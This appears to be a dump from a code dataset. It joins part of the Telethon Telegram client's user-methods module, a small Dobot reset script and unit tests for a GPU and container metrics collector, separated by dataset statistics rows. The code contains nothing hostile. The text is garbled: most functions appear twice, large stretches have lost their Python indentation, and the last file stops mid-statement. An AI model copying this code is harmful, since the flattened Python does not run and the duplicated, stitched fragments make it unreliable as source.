        # Normalise to a tuple so single and batched calls share one path.
        single = not utils.is_list_like(entity)
        if single:
            entity = (entity,)
        # Group input entities by string (resolve username),
        # input users (get users), input chat (get chats) and
        # input channels (get channels) to get the most entities
        # in the less amount of calls possible.
        inputs = []
        for x in entity:
            if isinstance(x, str):
                inputs.append(x)
            else:
                inputs.append(await self.get_input_entity(x))
        users = [x for x in inputs
                 if isinstance(x, (types.InputPeerUser, types.InputPeerSelf))]
        chats = [x.chat_id for x in inputs
                 if isinstance(x, types.InputPeerChat)]
        channels = [x for x in inputs
                    if isinstance(x, types.InputPeerChannel)]
        if users:
            # GetUsersRequest has a limit of 200 per call
            tmp = []
            while users:
                curr, users = users[:200], users[200:]
                tmp.extend(await self(functions.users.GetUsersRequest(curr)))
            users = tmp
        if chats:  # TODO Handle chats slice?
            chats = (await self(
                functions.messages.GetChatsRequest(chats))).chats
        if channels:
            channels = (await self(
                functions.channels.GetChannelsRequest(channels))).chats
        # Merge users, chats and channels into a single dictionary
        id_entity = {
            utils.get_peer_id(x): x
            for x in itertools.chain(users, chats, channels)
        }
        # We could check saved usernames and put them into the users,
        # chats and channels list from before. While this would reduce
        # the amount of ResolveUsername calls, it would fail to catch
        # username changes.
        result = []
        for x in inputs:
            if isinstance(x, str):
                result.append(await self._get_entity_from_string(x))
            elif not isinstance(x, types.InputPeerSelf):
                result.append(id_entity[utils.get_peer_id(x)])
            else:
                # InputPeerSelf: pick the :tl:`User` flagged as ourselves.
                result.append(next(
                    u for u in id_entity.values()
                    if isinstance(u, types.User) and u.is_self
                ))
        return result[0] if single else result
    async def get_input_entity(self, peer):
        """
        Turns the given peer into its input entity version. Most requests
        use this kind of :tl:`InputPeer`, so this is the most suitable call
        to make for those cases. **Generally you should let the library do
        its job** and don't worry about getting the input entity first, but
        if you're going to use an entity often, consider making the call:

        >>> import asyncio
        >>> rc = asyncio.get_event_loop().run_until_complete
        >>>
        >>> from telethon import TelegramClient
        >>> client = TelegramClient(...)
        >>> # If you're going to use "username" often in your code
        >>> # (make a lot of calls), consider getting its input entity
        >>> # once, and then using the "user" everywhere instead.
        >>> user = rc(client.get_input_entity('username'))
        >>> # The same applies to IDs, chats or channels.
        >>> chat = rc(client.get_input_entity(-123456789))

        entity (`str` | `int` | :tl:`Peer` | :tl:`InputPeer`):
            If an username is given, **the library will use the cache**. This
            means that it's possible to be using an username that *changed*.
            If the username is not found in the cache, it will be fetched.

            The same rules apply to phone numbers (``'+34 123456789'``).

            If an exact name is given, it must be in the cache too. This
            is not reliable as different people can share the same name
            and which entity is returned is arbitrary, and should be used
            only for quick tests.

            If a positive integer ID is given, the entity will be searched
            in cached users, chats or channels, without making any call.

            If a negative integer ID is given, the entity will be searched
            exactly as either a chat (prefixed with ``-``) or as a channel
            (prefixed with ``-100``).

            If a :tl:`Peer` is given, it will be searched exactly in the
            cache as either an user, chat or channel.

            If the given object can be turned into an input entity directly,
            said operation will be done.

            Invite links make an API call **always** and are expensive.
            You should use the chat ID instead.

            Unsupported types will raise ``TypeError``.

            If the entity can't be found, ``ValueError`` will be raised.

        Returns:
            :tl:`InputPeerUser`, :tl:`InputPeerChat` or :tl:`InputPeerChannel`
            or :tl:`InputPeerSelf` if the parameter is ``'me'`` or ``'self'``.

            If you need to get the ID of yourself, you should use
            `get_me` with ``input_peer=True``) instead.
        """
        if peer in ('me', 'self'):
            return types.InputPeerSelf()
        try:
            # First try to get the entity from cache, otherwise figure it out
            return self.session.get_input_entity(peer)
        except ValueError:
            pass
        if isinstance(peer, str):
            # Username, phone or invite link: resolve over the network.
            return utils.get_input_peer(
                await self._get_entity_from_string(peer))
        if not isinstance(peer, int) and (not isinstance(peer, TLObject)
                                          or peer.SUBCLASS_OF_ID != 0x2d45687):
            # Try casting the object into an input peer. Might TypeError.
            # Don't do it if a not-found ID was given (instead ValueError).
            # Also ignore Peer (0x2d45687 == crc32(b'Peer'))'s, lacking hash.
            return utils.get_input_peer(peer)
        raise ValueError(
            'Could not find the input entity for "{}". Please read https://'
            'telethon.readthedocs.io/en/latest/extra/basic/entities.html to'
            ' find out more details.'
            .format(peer)
        )
async def get_peer_id(self, peer, add_mark=True):
"""
Gets the ID for the given peer, which may be anything entity-like.
This method needs to be ``async`` because `peer` supports usernames,
invite-links, phone numbers, etc.
If ``add_mark is False``, then a positive ID will be returned
instead. By default, bot-API style IDs (signed) are returned.
"""
if isinstance(peer, int):
return utils.get_peer_id(peer, add_mark=add_mark)
try:
if peer.SUBCLASS_OF_ID in (0x2d45687, 0xc91c90b6):
# 0x2d45687, 0xc91c90b6 == crc32(b'Peer') and b'InputPeer'
return utils.get_peer_id(peer)
except AttributeError:
pass
peer = await self.get_input_entity(peer)
if isinstance(peer, types.InputPeerSelf):
peer = await self.get_me(input_peer=True)
return utils.get_peer_id(peer, add_mark=add_mark)
# endregion
# region Private methods
async def _get_entity_from_string(self, string):
"""
Gets a full entity from the given string, which may be a phone or
an username, and processes all the found entities on the session.
The string may also be a user link, or a channel/chat invite link.
This method has the side effect of adding the found users to the
session database, so it can be queried later without API calls,
if this option is enabled on the session.
Returns the found entity, or raises TypeError if not found.
"""
phone = utils.parse_phone(string)
if phone:
for user in (await self(
functions.contacts.GetContactsRequest(0))).users:
if user.phone == phone:
return user
else:
username, is_join_chat = utils.parse_username(string)
if is_join_chat:
invite = await self(
functions.messages.CheckChatInviteRequest(username))
if isinstance(invite, types.ChatInvite):
raise ValueError(
'Cannot get entity from a channel (or group) '
'that you are not part of. Join the group and retry'
)
elif isinstance(invite, types.ChatInviteAlready):
return invite.chat
elif username:
if username in ('me', 'self'):
return await self.get_me()
try:
result = await self(
functions.contacts.ResolveUsernameRequest(username))
except errors.UsernameNotOccupiedError as e:
raise ValueError('No user has "{}" as username'
.format(username)) from e
for entity in itertools.chain(result.users, result.chats):
if getattr(entity, 'username', None) or '' \
.lower() == username:
return entity
try:
# Nobody with this username, maybe it's an exact name/title
return await self.get_entity(
self.session.get_input_entity(string))
except ValueError:
pass
raise ValueError(
'Cannot find any entity corresponding to "{}"'.format(string)
)
    async def _get_input_notify(self, notify):
        """
        Returns a :tl:`InputNotifyPeer`. This is a bit tricky because
        it may or may not need access to the client to convert what's
        given into an input entity.

        NOTE(review): if ``notify`` is a TLObject whose ``SUBCLASS_OF_ID``
        is *not* 0x58981615, this method falls through and implicitly
        returns ``None`` — confirm callers handle that case.
        """
        try:
            # 0x58981615 is presumably the SUBCLASS_OF_ID of the abstract
            # InputNotifyPeer type -- TODO confirm against the TL schema.
            if notify.SUBCLASS_OF_ID == 0x58981615:
                if isinstance(notify, types.InputNotifyPeer):
                    # The inner peer may still be entity-like; resolve it.
                    notify.peer = await self.get_input_entity(notify.peer)
                return notify
        except AttributeError:
            # Not a TLObject: treat it as an entity and wrap it ourselves.
            return types.InputNotifyPeer(await self.get_input_entity(notify))
# endregion
| 41.042289 | 80 | 0.576217 | import asyncio
import itertools
import logging
import time
from .telegrambaseclient import TelegramBaseClient
from .. import errors, utils
from ..tl import TLObject, TLRequest, types, functions
__log__ = logging.getLogger(__name__)
_NOT_A_REQUEST = TypeError('You can only invoke requests, not types!')
class UserMethods(TelegramBaseClient):
async def __call__(self, request, ordered=False):
for r in (request if utils.is_list_like(request) else (request,)):
if not isinstance(r, TLRequest):
raise _NOT_A_REQUEST
await r.resolve(self, utils)
if r.CONSTRUCTOR_ID in self._flood_waited_requests:
due = self._flood_waited_requests[r.CONSTRUCTOR_ID]
diff = round(due - time.time())
if diff <= 3: # Flood waits below 3 seconds are "ignored"
self._flood_waited_requests.pop(r.CONSTRUCTOR_ID, None)
elif diff <= self.flood_sleep_threshold:
__log__.info('Sleeping early for %ds on flood wait', diff)
await asyncio.sleep(diff, loop=self._loop)
self._flood_waited_requests.pop(r.CONSTRUCTOR_ID, None)
else:
raise errors.FloodWaitError(capture=diff)
request_index = 0
self._last_request = time.time()
for _ in range(self._request_retries):
try:
future = self._sender.send(request, ordered=ordered)
if isinstance(future, list):
results = []
for f in future:
result = await f
self.session.process_entities(result)
results.append(result)
request_index += 1
return results
else:
result = await future
self.session.process_entities(result)
return result
except (errors.ServerError, errors.RpcCallFailError) as e:
__log__.warning('Telegram is having internal issues %s: %s',
e.__class__.__name__, e)
except (errors.FloodWaitError, errors.FloodTestPhoneWaitError) as e:
if utils.is_list_like(request):
request = request[request_index]
self._flood_waited_requests\
[request.CONSTRUCTOR_ID] = time.time() + e.seconds
if e.seconds <= self.flood_sleep_threshold:
__log__.info('Sleeping for %ds on flood wait', e.seconds)
await asyncio.sleep(e.seconds, loop=self._loop)
else:
raise
except (errors.PhoneMigrateError, errors.NetworkMigrateError,
errors.UserMigrateError) as e:
__log__.info('Phone migrated to %d', e.new_dc)
should_raise = isinstance(e, (
errors.PhoneMigrateError, errors.NetworkMigrateError
))
if should_raise and await self.is_user_authorized():
raise
await self._switch_dc(e.new_dc)
raise ValueError('Number of retries reached 0')
# region Public methods
async def get_me(self, input_peer=False):
if input_peer and self._self_input_peer:
return self._self_input_peer
try:
me = (await self(
functions.users.GetUsersRequest([types.InputUserSelf()])))[0]
if not self._self_input_peer:
self._self_input_peer = utils.get_input_peer(
me, allow_self=False
)
return self._self_input_peer if input_peer else me
except errors.UnauthorizedError:
return None
async def is_user_authorized(self):
if self._self_input_peer is not None or self._state.pts != -1:
return True
try:
self._state = await self(functions.updates.GetStateRequest())
return True
except errors.RPCError:
return False
async def get_entity(self, entity):
single = not utils.is_list_like(entity)
if single:
entity = (entity,)
# Group input entities by string (resolve username),
# input users (get users), input chat (get chats) and
# input channels (get channels) to get the most entities
# in the less amount of calls possible.
inputs = []
for x in entity:
if isinstance(x, str):
inputs.append(x)
else:
inputs.append(await self.get_input_entity(x))
users = [x for x in inputs
if isinstance(x, (types.InputPeerUser, types.InputPeerSelf))]
chats = [x.chat_id for x in inputs
if isinstance(x, types.InputPeerChat)]
channels = [x for x in inputs
if isinstance(x, types.InputPeerChannel)]
if users:
# GetUsersRequest has a limit of 200 per call
tmp = []
while users:
curr, users = users[:200], users[200:]
tmp.extend(await self(functions.users.GetUsersRequest(curr)))
users = tmp
if chats: # TODO Handle chats slice?
chats = (await self(
functions.messages.GetChatsRequest(chats))).chats
if channels:
channels = (await self(
functions.channels.GetChannelsRequest(channels))).chats
# Merge users, chats and channels into a single dictionary
id_entity = {
utils.get_peer_id(x): x
for x in itertools.chain(users, chats, channels)
}
# We could check saved usernames and put them into the users,
# chats and channels list from before. While this would reduce
# the amount of ResolveUsername calls, it would fail to catch
# username changes.
result = []
for x in inputs:
if isinstance(x, str):
result.append(await self._get_entity_from_string(x))
elif not isinstance(x, types.InputPeerSelf):
result.append(id_entity[utils.get_peer_id(x)])
else:
result.append(next(
u for u in id_entity.values()
if isinstance(u, types.User) and u.is_self
))
return result[0] if single else result
async def get_input_entity(self, peer):
if peer in ('me', 'self'):
return types.InputPeerSelf()
try:
# First try to get the entity from cache, otherwise figure it out
return self.session.get_input_entity(peer)
except ValueError:
pass
if isinstance(peer, str):
return utils.get_input_peer(
await self._get_entity_from_string(peer))
if not isinstance(peer, int) and (not isinstance(peer, TLObject)
or peer.SUBCLASS_OF_ID != 0x2d45687):
# Try casting the object into an input peer. Might TypeError.
# Don't do it if a not-found ID was given (instead ValueError).
return utils.get_input_peer(peer)
raise ValueError(
'Could not find the input entity for "{}". Please read https://'
'telethon.readthedocs.io/en/latest/extra/basic/entities.html to'
' find out more details.'
.format(peer)
)
async def get_peer_id(self, peer, add_mark=True):
if isinstance(peer, int):
return utils.get_peer_id(peer, add_mark=add_mark)
try:
if peer.SUBCLASS_OF_ID in (0x2d45687, 0xc91c90b6):
# 0x2d45687, 0xc91c90b6 == crc32(b'Peer') and b'InputPeer'
return utils.get_peer_id(peer)
except AttributeError:
pass
peer = await self.get_input_entity(peer)
if isinstance(peer, types.InputPeerSelf):
peer = await self.get_me(input_peer=True)
return utils.get_peer_id(peer, add_mark=add_mark)
# endregion
# region Private methods
async def _get_entity_from_string(self, string):
phone = utils.parse_phone(string)
if phone:
for user in (await self(
functions.contacts.GetContactsRequest(0))).users:
if user.phone == phone:
return user
else:
username, is_join_chat = utils.parse_username(string)
if is_join_chat:
invite = await self(
functions.messages.CheckChatInviteRequest(username))
if isinstance(invite, types.ChatInvite):
raise ValueError(
'Cannot get entity from a channel (or group) '
'that you are not part of. Join the group and retry'
)
elif isinstance(invite, types.ChatInviteAlready):
return invite.chat
elif username:
if username in ('me', 'self'):
return await self.get_me()
try:
result = await self(
functions.contacts.ResolveUsernameRequest(username))
except errors.UsernameNotOccupiedError as e:
raise ValueError('No user has "{}" as username'
.format(username)) from e
for entity in itertools.chain(result.users, result.chats):
if getattr(entity, 'username', None) or '' \
.lower() == username:
return entity
try:
# Nobody with this username, maybe it's an exact name/title
return await self.get_entity(
self.session.get_input_entity(string))
except ValueError:
pass
raise ValueError(
'Cannot find any entity corresponding to "{}"'.format(string)
)
async def _get_input_notify(self, notify):
try:
if notify.SUBCLASS_OF_ID == 0x58981615:
if isinstance(notify, types.InputNotifyPeer):
notify.peer = await self.get_input_entity(notify.peer)
return notify
except AttributeError:
return types.InputNotifyPeer(await self.get_input_entity(notify))
| true | true |
f72ead7d4b9e3e317119cf83ac6cb3d4a19f18ec | 340 | py | Python | examples/resetting_errors.py | MK8J/dobot-python | 3ce4a2a5d6e9ae5ab6d42546eab0228419e82e8e | [
"MIT"
] | null | null | null | examples/resetting_errors.py | MK8J/dobot-python | 3ce4a2a5d6e9ae5ab6d42546eab0228419e82e8e | [
"MIT"
] | null | null | null | examples/resetting_errors.py | MK8J/dobot-python | 3ce4a2a5d6e9ae5ab6d42546eab0228419e82e8e | [
"MIT"
] | null | null | null | '''
A script to try and reset from a stage error
without having to turn off the dobot
'''
import sys
import os
sys.path.append(os.path.abspath('..'))
import connecting
#connect
bot = connecting.connect()
bot.reset_pose(1,45,45) # 0 is false, will try to automatically reset?
bot.clear_alarms_state()
bot.serial.close()
#import homing
| 17 | 70 | 0.738235 | import sys
import os
sys.path.append(os.path.abspath('..'))
import connecting
bot = connecting.connect()
bot.reset_pose(1,45,45)
bot.clear_alarms_state()
bot.serial.close()
| true | true |
f72eadfc88eda868eba4d4b77c1b8a758b724676 | 18,817 | py | Python | src/docker-images/job-exporter/test/test_collector.py | jinlmsft/Apulis-AI-Platform | 2cf1fbb50e08b477940f5f336b1b897a49608b72 | [
"MIT"
] | 38 | 2020-07-13T08:46:39.000Z | 2021-02-08T01:38:44.000Z | src/docker-images/job-exporter/test/test_collector.py | debbie-alaine/DLWorkspace | 2888042c0f9388f911bc74fe5ecd20ef3fabd715 | [
"MIT"
] | null | null | null | src/docker-images/job-exporter/test/test_collector.py | debbie-alaine/DLWorkspace | 2888042c0f9388f911bc74fe5ecd20ef3fabd715 | [
"MIT"
] | 20 | 2020-07-14T03:38:50.000Z | 2021-01-08T06:24:17.000Z | # Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import sys
import unittest
import datetime
import time
import logging
import base
sys.path.append(os.path.abspath("../src/"))
import collector
import nvidia
import docker_inspect
from collector import ContainerCollector
from collector import GpuCollector
logger = logging.getLogger(__name__)
class TestContainerCollector(base.TestBase):
    """
    Test ContainerCollector in collector.py
    """
    def test_parse_from_labels(self):
        # Positional fields assumed from the constructor call: username,
        # job name, role, task index, pod name, GPU id string, pid, email,
        # vc name, is-host-network -- TODO confirm against docker_inspect.
        inspect_result = docker_inspect.InspectResult(
            "openmindstudio",
            "trialslot_nnimain_d65bc5ac",
            "tuner",
            "0",
            "this_is_pod_name_val",
            "0,1,",
            12345,
            "dixu@example.com",
            "platform",
            False,
        )
        gpu_ids, labels = ContainerCollector.parse_from_labels(
            inspect_result, None)
        # "0,1," must be split into ids, dropping the trailing empty entry.
        self.assertEqual(["0", "1"], gpu_ids)
        target_labels = {
            "username": "openmindstudio",
            "job_name": "trialslot_nnimain_d65bc5ac",
            "role_name": "tuner",
            "task_index": "0",
            "pod_name": "this_is_pod_name_val",
            "user_email": "dixu@example.com",
            "vc_name": "platform",
        }
        self.assertEqual(target_labels, labels)
    def test_infer_service_name(self):
        # Pause containers (the "POD" sandbox) yield no service name.
        self.assertIsNone(
            ContainerCollector.infer_service_name(
                "k8s_POD_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8"
            ))
        # Regular k8s container names yield the service part.
        self.assertEqual(
            "alertmanager",
            ContainerCollector.infer_service_name(
                "k8s_alertmanager_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8-a62d-000d3ab25bb6_2"
            ))
        # kube-system components are excluded as well.
        self.assertIsNone(
            ContainerCollector.infer_service_name(
                "k8s_kube-scheduler_kube-scheduler-10.151.40.4_kube-system_f1164d931979939cf0601155df9c748a_6"
            ))
class TestDockerCollector(base.TestBase):
    """
    Test DockerCollector in collector.py
    """
    def assert_metrics(self, metrics):
        # Shared helper: expect exactly one metric family with one sample.
        self.assertEqual(1, len(metrics))
        self.assertEqual(1, len(metrics[0].samples))
        sample = metrics[0].samples[0]
        self.assertEqual(1, len(sample[1])) # label keys
        self.assertEqual(1, sample[2]) # sample value
    def test_impl(self):
        # Call collect_impl() synchronously, without the collector thread.
        _, c = collector.instantiate_collector("test_docker_collector1", 0.5,
                                               datetime.timedelta(seconds=1),
                                               collector.DockerCollector)
        self.assert_metrics(c.collect_impl())
    def test_base_collector(self):
        """ actually setup DockerCollector thread, and test, since this is multi-thread
        test case, maybe sensitive to the system load """
        ref = collector.make_collector("test_docker_collector2", 0.5,
                                       datetime.timedelta(seconds=10),
                                       collector.DockerCollector)
        metrics = None
        # Poll up to 20 * 0.1s = 2s for the background thread to publish.
        for i in range(20):
            metrics = ref.get(datetime.datetime.now())
            if metrics is not None:
                break
            time.sleep(0.1)
        self.assert_metrics(metrics)
class TestZombieCollector(base.TestBase):
    """
    Test ZombieCollector in collector.py
    """
    def setUp(self):
        # Because prometheus forbid same metric name, and we generate metric
        # in from name, we need to differentiate name using time.
        t = str(time.time()).replace(".", "_")
        decay_time = datetime.timedelta(seconds=1)
        _, self.collector = collector.instantiate_collector(
            "test_zombie_collector" + t, 0.5, decay_time,
            collector.ZombieCollector, collector.AtomicRef(decay_time),
            collector.AtomicRef(decay_time))
    def test_update_zombie_count_type1(self):
        # A container is only reported as a type-1 zombie after it has been
        # seen continuously for longer than the recorder's decay_time.
        start = datetime.datetime.now()
        one_sec = datetime.timedelta(seconds=1)
        type1_recorder = self.collector.type1_zombies
        # First sighting: recorded but not yet reported.
        self.assertEqual(
            set(), self.collector.update_zombie_count_type1({"a", "b"}, start))
        self.assertEqual(2, len(type1_recorder))
        # Still within the decay window: nothing reported.
        self.assertEqual(
            set(),
            self.collector.update_zombie_count_type1(
                {"a", "b"}, start + type1_recorder.decay_time - one_sec))
        self.assertEqual(2, len(type1_recorder))
        # Past the decay window: both are now reported as zombies.
        self.assertEqual({"a", "b"},
                         self.collector.update_zombie_count_type1(
                             {"a", "b"},
                             start + type1_recorder.decay_time + one_sec))
        self.assertEqual(2, len(type1_recorder))
        # "b" disappeared, so only "a" remains tracked and reported.
        self.assertEqual({"a"},
                         self.collector.update_zombie_count_type1(
                             {"a"},
                             start + type1_recorder.decay_time + 2 * one_sec))
        self.assertEqual(1, len(type1_recorder))
        # All gone: the recorder is drained. (Empty dict iterates like an
        # empty set here -- presumably intentional; confirm in collector.)
        self.assertEqual(
            set(),
            self.collector.update_zombie_count_type1(
                {}, start + type1_recorder.decay_time + 3 * one_sec))
        self.assertEqual(0, len(type1_recorder))
    def test_update_zombie_count_type2(self):
        # Type-2 zombie: a job container whose companion container (same
        # yarn container id in the name) has disappeared for > decay_time.
        start = datetime.datetime.now()
        one_sec = datetime.timedelta(seconds=1)
        stats = {
            "43ffe701d883": {
                "name":
                "core-caffe2_resnet50_20181012040921.586-container_e03_1539312078880_0780_01_000002",
                "id":
                "43ffe701d883"
            },
            "8de2f53e64cb": {
                "name": "container_e03_1539312078880_0780_01_000002",
                "id": "8de2f53e64cb"
            }
        }
        type2_recorder = self.collector.type2_zombies
        # Both containers present: nothing is a zombie.
        self.assertEqual(set(),
                         self.collector.update_zombie_count_type2(stats, start))
        # Companion vanishes; report only after its decay window passes.
        stats.pop("8de2f53e64cb")
        self.assertEqual(
            set(),
            self.collector.update_zombie_count_type2(stats, start + one_sec))
        self.assertEqual(
            set(),
            self.collector.update_zombie_count_type2(
                stats, start + type2_recorder.decay_time))
        self.assertEqual({"43ffe701d883"},
                         self.collector.update_zombie_count_type2(
                             stats,
                             start + type2_recorder.decay_time + 2 * one_sec))
        # Once the orphan itself disappears, nothing is reported.
        stats.pop("43ffe701d883")
        self.assertEqual(
            set(),
            self.collector.update_zombie_count_type2(
                stats, start + type2_recorder.decay_time + 3 * one_sec))
class TestGpuCollector(base.TestBase):
    """
    Test GpuCollector in collector.py
    """
    def make_pid_to_cid_fn(self, mapping):
        # Build a fake pid -> container-id resolver returning (found, cid).
        def fn(pid):
            if pid in mapping:
                return True, mapping[pid]
            return False, ""
        return fn
    def test_convert_to_metrics(self):
        # sample may not ordered, and can not assertEqual directly, so tear them apart
        # NvidiaGpuStatus args (assumed from the calls): gpu util, mem util,
        # pids, ecc errors, minor number, uuid, temperature -- TODO confirm.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0",
                                   "GPU-uuid0", 37.0)
        ])
        zombie_info = {"abc", "def"}
        pid_to_cid_mapping = {33: "def", 22: "ghi"} # only 33 is zombie
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        target_core_utils = collector.gen_gpu_util_gauge()
        target_core_utils.add_metric(["0", "GPU-uuid0"], 20)
        self.assertEqual(target_core_utils, core_utils)
        target_mem_utils = collector.gen_gpu_mem_util_gauge()
        target_mem_utils.add_metric(["0", "GPU-uuid0"], 21)
        self.assertEqual(target_mem_utils, mem_utils)
        target_ecc_errors = collector.gen_gpu_ecc_counter()
        target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_single"], 0)
        target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_double"], 0)
        target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_single"], 0)
        target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_double"], 0)
        self.assertEqual(target_ecc_errors, ecc_errors)
        target_mem_leak = collector.gen_gpu_memory_leak_counter()
        self.assertEqual(target_mem_leak, mem_leak)
        # pid 44 maps to no container, so it counts as an external process.
        target_external_process = collector.gen_gpu_used_by_external_process_counter(
        )
        target_external_process.add_metric(["0", "44"], 1)
        self.assertEqual(target_external_process, external_process)
        # pid 33 maps to container "def", which is in zombie_info.
        target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
        )
        target_zombie_container.add_metric(["0", "def"], 1)
        self.assertEqual(target_zombie_container, zombie_container)
        target_gpu_temp = collector.gen_gpu_temperature_gauge()
        target_gpu_temp.add_metric(["0", "GPU-uuid0"], 37.0)
        self.assertEqual(target_gpu_temp, gpu_temp)
        # test minor 1: non-zero ECC counters must be surfaced per type.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(
                30, 31, [55, 123],
                nvidia.EccError(volatile_single=2,
                                volatile_double=3,
                                aggregated_single=4,
                                aggregated_double=5), "1", "GPU-uuid1", 24.0)
        ])
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        target_core_utils = collector.gen_gpu_util_gauge()
        target_core_utils.add_metric(["1", "GPU-uuid1"], 30)
        self.assertEqual(target_core_utils, core_utils)
        target_mem_utils = collector.gen_gpu_mem_util_gauge()
        target_mem_utils.add_metric(["1", "GPU-uuid1"], 31)
        self.assertEqual(target_mem_utils, mem_utils)
        target_ecc_errors = collector.gen_gpu_ecc_counter()
        target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_single"], 2)
        target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_double"], 3)
        target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_single"], 4)
        target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_double"], 5)
        self.assertEqual(target_ecc_errors, ecc_errors)
        target_mem_leak = collector.gen_gpu_memory_leak_counter()
        self.assertEqual(target_mem_leak, mem_leak)
        # Neither 55 nor 123 maps to a known container: both are external.
        target_external_process = collector.gen_gpu_used_by_external_process_counter(
        )
        target_external_process.add_metric(["1", "55"], 1)
        target_external_process.add_metric(["1", "123"], 1)
        self.assertEqual(target_external_process, external_process)
        target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
        )
        self.assertEqual(target_zombie_container, zombie_container)
        target_gpu_temp = collector.gen_gpu_temperature_gauge()
        target_gpu_temp.add_metric(["1", "GPU-uuid1"], 24.0)
        self.assertEqual(target_gpu_temp, gpu_temp)
        # test minor 2: memory used exactly at the threshold with no pids
        # is NOT reported as a leak.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024, [], nvidia.EccError(),
                                   "2", "GPU-uuid2", 30.0)
        ])
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        target_core_utils = collector.gen_gpu_util_gauge()
        target_core_utils.add_metric(["2", "GPU-uuid2"], 40)
        self.assertEqual(target_core_utils, core_utils)
        target_mem_utils = collector.gen_gpu_mem_util_gauge()
        target_mem_utils.add_metric(["2", "GPU-uuid2"], 20 * 1024 * 1024)
        self.assertEqual(target_mem_utils, mem_utils)
        target_ecc_errors = collector.gen_gpu_ecc_counter()
        target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_single"], 0)
        target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_double"], 0)
        target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_single"], 0)
        target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_double"], 0)
        self.assertEqual(target_ecc_errors, ecc_errors)
        target_mem_leak = collector.gen_gpu_memory_leak_counter()
        self.assertEqual(target_mem_leak, mem_leak)
        target_external_process = collector.gen_gpu_used_by_external_process_counter(
        )
        self.assertEqual(target_external_process, external_process)
        target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
        )
        self.assertEqual(target_zombie_container, zombie_container)
        target_gpu_temp = collector.gen_gpu_temperature_gauge()
        target_gpu_temp.add_metric(["2", "GPU-uuid2"], 30.0)
        self.assertEqual(target_gpu_temp, gpu_temp)
        # test memory leak: usage above the threshold with no owning pids
        # IS reported as a leak.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024 + 1, [],
                                   nvidia.EccError(), "3", "GPU-uuid3", 30.0)
        ])
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        target_mem_leak = collector.gen_gpu_memory_leak_counter()
        target_mem_leak.add_metric(["3", "GPU-uuid3"], 1)
        self.assertEqual(target_mem_leak, mem_leak)
    def test_convert_to_metrics_with_no_zombie_info_BUGFIX(self):
        # Regression test: external-process metrics must be produced even
        # when there is no zombie information at all.
        gpu_info = nvidia.construct_gpu_info([
            nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0",
                                   "GPU-uuid0", 40.0)
        ])
        # zombie_info is empty should also have external process metric
        zombie_info = []
        pid_to_cid_mapping = {
            33: "def",
            22: "ghi"
        } # only 44 is external process
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
            20 * 1024)
        core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
        self.assertEqual(0, len(zombie_container.samples))
        self.assertEqual(1, len(external_process.samples))
        self.assertEqual("0",
                         external_process.samples[0].labels["minor_number"])
        self.assertEqual("44", external_process.samples[0].labels["pid"])
        # zombie_info is None should also have external process metric
        zombie_info = None
        metrics = GpuCollector.convert_to_metrics(
            gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
